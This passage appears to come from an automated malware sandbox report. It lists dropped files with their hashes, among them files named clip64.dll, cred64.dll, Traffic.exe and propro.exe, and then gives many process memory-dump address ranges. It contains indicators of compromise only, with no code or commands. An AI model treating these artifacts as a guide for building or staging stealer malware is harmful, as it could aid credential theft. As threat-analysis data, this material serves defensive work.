
                                                                                                                                      Filesize

                                                                                                                                      1.2MB

                                                                                                                                      MD5

                                                                                                                                      15a42d3e4579da615a384c717ab2109b

                                                                                                                                      SHA1

                                                                                                                                      22aeedeb2307b1370cdab70d6a6b6d2c13ad2301

                                                                                                                                      SHA256

                                                                                                                                      3c97bb410e49b11af8116feb7240b7101e1967cae7538418c45c3d2e072e8103

                                                                                                                                      SHA512

                                                                                                                                      1eb7f126dccc88a2479e3818c36120f5af3caa0d632b9ea803485ee6531d6e2a1fd0805b1c4364983d280df23ea5ca3ad4a5fca558ac436efae36af9b795c444

                                                                                                                                    • C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\clip64.dll

                                                                                                                                      Filesize

                                                                                                                                      109KB

                                                                                                                                      MD5

                                                                                                                                      154c3f1334dd435f562672f2664fea6b

                                                                                                                                      SHA1

                                                                                                                                      51dd25e2ba98b8546de163b8f26e2972a90c2c79

                                                                                                                                      SHA256

                                                                                                                                      5f431129f97f3d56929f1e5584819e091bd6c854d7e18503074737fc6d79e33f

                                                                                                                                      SHA512

                                                                                                                                      1bca69bbcdb7ecd418769e9d4befc458f9f8e3cee81feb7316bb61e189e2904f4431e4cc7d291e179a5dec441b959d428d8e433f579036f763bbad6460222841

                                                                                                                                    • C:\Users\Admin\AppData\Roaming\c1ec479e5342a2\cred64.dll

                                                                                                                                      Filesize

                                                                                                                                      1.2MB

                                                                                                                                      MD5

                                                                                                                                      f35b671fda2603ec30ace10946f11a90

                                                                                                                                      SHA1

                                                                                                                                      059ad6b06559d4db581b1879e709f32f80850872

                                                                                                                                      SHA256

                                                                                                                                      83e3df5bec15d5333935bea8b719a6d677e2fb3dc1cf9e18e7b82fd0438285c7

                                                                                                                                      SHA512

                                                                                                                                      b5fa27d08c64727cef7fdda5e68054a4359cd697df50d70d1d90da583195959a139066a6214531bbc5f20cd4f9bc1ca3e4244396547381291a6a1d2df9cf8705

                                                                                                                                    • C:\Users\Admin\AppData\Roaming\configurationValue\Traffic.exe

                                                                                                                                      Filesize

                                                                                                                                      541KB

                                                                                                                                      MD5

                                                                                                                                      1fc4b9014855e9238a361046cfbf6d66

                                                                                                                                      SHA1

                                                                                                                                      c17f18c8246026c9979ab595392a14fe65cc5e9f

                                                                                                                                      SHA256

                                                                                                                                      f38c27ecbeed9721f0885d3b2f2f767d60a5d1c0a5c98433357f570987da3e50

                                                                                                                                      SHA512

                                                                                                                                      2af234cac24ec4a508693d9affa7f759d4b29bb3c9ddffd9e6350959fd4da26501553399d2b02a8eeae8dace6bfe9b2ce50462ce3c6547497f5b0ea6ed226b12

                                                                                                                                    • C:\Users\Admin\AppData\Roaming\configurationValue\propro.exe

                                                                                                                                      Filesize

                                                                                                                                      304KB

                                                                                                                                      MD5

                                                                                                                                      cc90e3326d7b20a33f8037b9aab238e4

                                                                                                                                      SHA1

                                                                                                                                      236d173a6ac462d85de4e866439634db3b9eeba3

                                                                                                                                      SHA256

                                                                                                                                      bd73ee49a23901f9fb235f8a5b29adc72cc637ad4b62a9760c306900cb1678b7

                                                                                                                                      SHA512

                                                                                                                                      b5d197a05a267bf66509b6d976924cd6f5963532a9f9f22d1763701d4fba3dfa971e0058388249409884bc29216fb33a51846562a5650f81d99ce14554861521

                                                                                                                                    • C:\Users\Public\Desktop\Google Chrome.lnk

                                                                                                                                      Filesize

                                                                                                                                      2KB

                                                                                                                                      MD5

                                                                                                                                      bac00f04beb4d60fe99f0dc3301ad6ef

                                                                                                                                      SHA1

                                                                                                                                      35557c12dba508f63c60b1dd916b18ab171f4a8a

                                                                                                                                      SHA256

                                                                                                                                      b09d16a2ac1a33bed3524ea62dfc9ba0c74ba39469754403d64f7f87ee2c6f65

                                                                                                                                      SHA512

                                                                                                                                      4b689d90e862009b291efa9045d3f7eede15f46d38d2d56ceed7a27413722b3ef00947739f3eb127184bb2c94f17ef008023042ea7ec441ff8daec9309d8a313

                                                                                                                                    • \ProgramData\nss3.dll

                                                                                                                                      Filesize

                                                                                                                                      2.0MB

                                                                                                                                      MD5

                                                                                                                                      1cc453cdf74f31e4d913ff9c10acdde2

                                                                                                                                      SHA1

                                                                                                                                      6e85eae544d6e965f15fa5c39700fa7202f3aafe

                                                                                                                                      SHA256

                                                                                                                                      ac5c92fe6c51cfa742e475215b83b3e11a4379820043263bf50d4068686c6fa5

                                                                                                                                      SHA512

                                                                                                                                      dd9ff4e06b00dc831439bab11c10e9b2ae864ea6e780d3835ea7468818f35439f352ef137da111efcdf2bb6465f6ca486719451bf6cf32c6a4420a56b1d64571

                                                                                                                                    • memory/452-108-0x0000018C67C20000-0x0000018C67C96000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      472KB

                                                                                                                                    • memory/452-103-0x00007FFAAB2B0000-0x00007FFAABC9C000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      9.9MB

                                                                                                                                    • memory/452-102-0x0000018C4F7F0000-0x0000018C4F812000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      136KB

                                                                                                                                    • memory/452-157-0x0000018C4F850000-0x0000018C4F860000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      64KB

                                                                                                                                    • memory/452-104-0x0000018C4F850000-0x0000018C4F860000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      64KB

                                                                                                                                    • memory/452-105-0x0000018C4F850000-0x0000018C4F860000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      64KB

                                                                                                                                    • memory/776-494-0x0000000000400000-0x000000000053D000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      1.2MB

                                                                                                                                    • memory/1816-877-0x0000000000290000-0x000000000073C000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4.7MB

                                                                                                                                    • memory/2448-443-0x0000000000400000-0x0000000000562000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      1.4MB

                                                                                                                                    • memory/2540-1298-0x0000000000290000-0x000000000073C000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4.7MB

                                                                                                                                    • memory/2540-981-0x0000000000290000-0x000000000073C000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4.7MB

                                                                                                                                    • memory/2540-573-0x0000000000290000-0x000000000073C000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4.7MB

                                                                                                                                    • memory/2540-1388-0x0000000000290000-0x000000000073C000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4.7MB

                                                                                                                                    • memory/2644-1305-0x0000000000400000-0x0000000000D1C000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      9.1MB

                                                                                                                                    • memory/2644-1392-0x0000000000400000-0x0000000000D1C000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      9.1MB

                                                                                                                                    • memory/2768-156-0x0000000072C90000-0x000000007337E000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      6.9MB

                                                                                                                                    • memory/2768-147-0x0000000000400000-0x0000000000592000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      1.6MB

                                                                                                                                    • memory/3016-966-0x0000000000350000-0x00000000007FC000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4.7MB

                                                                                                                                    • memory/3392-489-0x0000000000A40000-0x0000000000A56000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      88KB

                                                                                                                                    • memory/3436-15-0x0000000000370000-0x0000000000823000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4.7MB

                                                                                                                                    • memory/3436-2-0x0000000000370000-0x0000000000823000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4.7MB

                                                                                                                                    • memory/3436-3-0x0000000004EF0000-0x0000000004EF1000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/3436-6-0x0000000004EB0000-0x0000000004EB1000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/3436-10-0x0000000004F30000-0x0000000004F31000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/3436-4-0x0000000004EE0000-0x0000000004EE1000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/3436-1-0x0000000077A44000-0x0000000077A45000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/3436-9-0x0000000004F40000-0x0000000004F41000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/3436-5-0x0000000004F10000-0x0000000004F11000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/3436-8-0x0000000004EC0000-0x0000000004EC1000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/3436-0-0x0000000000370000-0x0000000000823000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4.7MB

                                                                                                                                    • memory/3436-7-0x0000000004ED0000-0x0000000004ED1000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/3700-18-0x0000000000160000-0x0000000000613000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4.7MB

                                                                                                                                    • memory/3700-26-0x0000000004B20000-0x0000000004B21000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/3700-25-0x0000000004AB0000-0x0000000004AB1000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/3700-279-0x0000000000160000-0x0000000000613000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4.7MB

                                                                                                                                    • memory/3700-449-0x0000000000160000-0x0000000000613000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4.7MB

                                                                                                                                    • memory/3700-67-0x0000000000160000-0x0000000000613000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4.7MB

                                                                                                                                    • memory/3700-68-0x0000000000160000-0x0000000000613000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4.7MB

                                                                                                                                    • memory/3700-24-0x0000000004AC0000-0x0000000004AC1000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/3700-1506-0x0000000000160000-0x0000000000613000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4.7MB

                                                                                                                                    • memory/3700-1111-0x0000000000160000-0x0000000000613000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4.7MB

                                                                                                                                    • memory/3700-19-0x0000000000160000-0x0000000000613000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4.7MB

                                                                                                                                    • memory/3700-831-0x0000000000160000-0x0000000000613000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4.7MB

                                                                                                                                    • memory/3700-148-0x0000000000160000-0x0000000000613000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4.7MB

                                                                                                                                    • memory/3700-252-0x0000000000160000-0x0000000000613000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4.7MB

                                                                                                                                    • memory/3700-20-0x0000000004AE0000-0x0000000004AE1000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/3700-84-0x0000000000160000-0x0000000000613000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4.7MB

                                                                                                                                    • memory/3700-21-0x0000000004AD0000-0x0000000004AD1000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/3700-1360-0x0000000000160000-0x0000000000613000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4.7MB

                                                                                                                                    • memory/3700-23-0x0000000004AA0000-0x0000000004AA1000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/3700-22-0x0000000004B00000-0x0000000004B01000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4KB

                                                                                                                                    • memory/3704-995-0x00000000011B0000-0x0000000001542000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      3.6MB

                                                                                                                                    • memory/3704-191-0x00000000011B0000-0x0000000001542000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      3.6MB

                                                                                                                                    • memory/3704-571-0x00000000011B0000-0x0000000001542000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      3.6MB

                                                                                                                                    • memory/3704-259-0x00000000011B0000-0x0000000001542000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      3.6MB

                                                                                                                                    • memory/3704-1281-0x00000000011B0000-0x0000000001542000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      3.6MB

                                                                                                                                    • memory/3704-85-0x00000000011B0000-0x0000000001542000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      3.6MB

                                                                                                                                    • memory/3704-1395-0x00000000011B0000-0x0000000001542000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      3.6MB

                                                                                                                                    • memory/3704-360-0x00000000011B0000-0x0000000001542000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      3.6MB

                                                                                                                                    • memory/3704-194-0x00000000011B0000-0x0000000001542000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      3.6MB

                                                                                                                                    • memory/3704-188-0x00000000011B0000-0x0000000001542000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      3.6MB

                                                                                                                                    • memory/3704-82-0x00000000011B0000-0x0000000001542000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      3.6MB

                                                                                                                                    • memory/4140-351-0x0000000000DE0000-0x000000000128C000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      4.7MB

                                                                                                                                    • memory/4164-482-0x0000000061E00000-0x0000000061EF3000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      972KB

                                                                                                                                    • memory/4164-797-0x0000000000400000-0x000000000063B000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      2.2MB

                                                                                                                                    • memory/4164-1034-0x0000000000400000-0x000000000063B000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      2.2MB

                                                                                                                                    • memory/4232-166-0x0000000072C90000-0x000000007337E000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      6.9MB

                                                                                                                                    • memory/4232-196-0x00000000068B0000-0x00000000068CE000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      120KB

                                                                                                                                    • memory/4232-186-0x0000000006110000-0x0000000006186000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      472KB

                                                                                                                                    • memory/4232-168-0x0000000005550000-0x0000000005560000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      64KB

                                                                                                                                    • memory/4232-167-0x0000000000CE0000-0x0000000000D32000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      328KB

                                                                                                                                    • memory/4284-138-0x0000000000CC0000-0x0000000000E7C000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      1.7MB

                                                                                                                                    • memory/4284-155-0x0000000003160000-0x0000000005160000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      32.0MB

                                                                                                                                    • memory/4284-154-0x0000000072C90000-0x000000007337E000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      6.9MB

                                                                                                                                    • memory/4284-140-0x00000000056E0000-0x00000000056F0000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      64KB

                                                                                                                                    • memory/4284-139-0x0000000072C90000-0x000000007337E000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      6.9MB

                                                                                                                                    • memory/4292-189-0x00007FFAAB2B0000-0x00007FFAABC9C000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      9.9MB

                                                                                                                                    • memory/4292-187-0x0000000000180000-0x000000000020C000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      560KB

                                                                                                                                    • memory/4556-158-0x0000000072C90000-0x000000007337E000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      6.9MB

                                                                                                                                    • memory/4556-53-0x0000000000400000-0x0000000000450000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      320KB

                                                                                                                                    • memory/4556-65-0x0000000007950000-0x000000000798E000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      248KB

                                                                                                                                    • memory/4556-66-0x0000000007990000-0x00000000079DB000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      300KB

                                                                                                                                    • memory/4556-83-0x0000000007BA0000-0x0000000007C06000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      408KB

                                                                                                                                    • memory/4556-198-0x0000000008550000-0x0000000008A7C000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      5.2MB

                                                                                                                                    • memory/4556-63-0x0000000007A20000-0x0000000007B2A000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      1.0MB

                                                                                                                                    • memory/4556-60-0x0000000004F00000-0x0000000004F0A000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      40KB

                                                                                                                                    • memory/4556-59-0x0000000004D90000-0x0000000004E22000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      584KB

                                                                                                                                    • memory/4556-192-0x0000000007E50000-0x0000000008012000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      1.8MB

                                                                                                                                    • memory/4556-61-0x0000000072C90000-0x000000007337E000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      6.9MB

                                                                                                                                    • memory/4556-62-0x00000000061C0000-0x00000000067C6000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      6.0MB

                                                                                                                                    • memory/4556-57-0x00000000051F0000-0x00000000056EE000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      5.0MB

                                                                                                                                    • memory/4556-64-0x0000000006180000-0x0000000006192000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      72KB

                                                                                                                                    • memory/4700-802-0x0000000000400000-0x0000000000D1C000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      9.1MB

                                                                                                                                    • memory/4700-962-0x0000000000400000-0x0000000000D1C000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      9.1MB

                                                                                                                                    • memory/4944-50-0x0000000005200000-0x0000000005210000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      64KB

                                                                                                                                    • memory/4944-58-0x0000000002B70000-0x0000000004B70000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      32.0MB

                                                                                                                                    • memory/4944-56-0x0000000072C90000-0x000000007337E000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      6.9MB

                                                                                                                                    • memory/4944-153-0x0000000002B70000-0x0000000004B70000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      32.0MB

                                                                                                                                    • memory/4944-48-0x0000000000880000-0x00000000008FA000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      488KB

                                                                                                                                    • memory/4944-49-0x0000000072C90000-0x000000007337E000-memory.dmp

                                                                                                                                      Filesize

                                                                                                                                      6.9MB